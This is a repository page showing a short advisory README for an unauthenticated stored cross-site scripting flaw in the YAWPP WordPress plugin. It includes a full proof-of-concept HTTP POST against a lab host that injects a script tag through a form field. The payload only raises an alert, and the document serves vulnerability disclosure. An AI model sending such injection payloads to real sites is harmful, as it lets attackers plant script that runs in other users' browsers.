crash.software
Projects
Pull Requests
Issues
Builds
WP-Vulnerabilities-Exploits
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY WP-Vulnerabilities-Exploits Files
🤬
main
..
README.md Loading last commit info...
README.md

YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

Description

The yawpp WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

POST /wordpress-4.3/?p=4 HTTP/1.1

Host: wp.lab

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://wp.lab/wordpress-4.3/?p=4

Cookie: wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1449056570

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 94



field1=<script>alert(/XSS-Field1/)</script>&field2=test2%40gmail.com&id=1&submit_yawpp=Valider
Please wait...
Page is in error, reload to recover